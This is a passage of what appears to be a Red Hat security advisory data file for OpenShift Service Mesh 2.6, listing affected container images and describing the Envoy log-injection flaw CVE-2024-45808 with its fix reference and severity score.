"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, { cve: "CVE-2024-45808", cwe: { id: "CWE-117", name: "Improper Output Neutralization for Logs", }, discovery_date: "2024-09-20T00:40:26.266584+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313685", }, ], notes: [ { category: "description", text: "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Malicious log injection via access logs", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application’s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45808", }, { category: "external", summary: "RHBZ#2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45808", url: "https://www.cve.org/CVERecord?id=CVE-2024-45808", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", }, ], release_date: "2024-09-20T00:15:02.733000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: 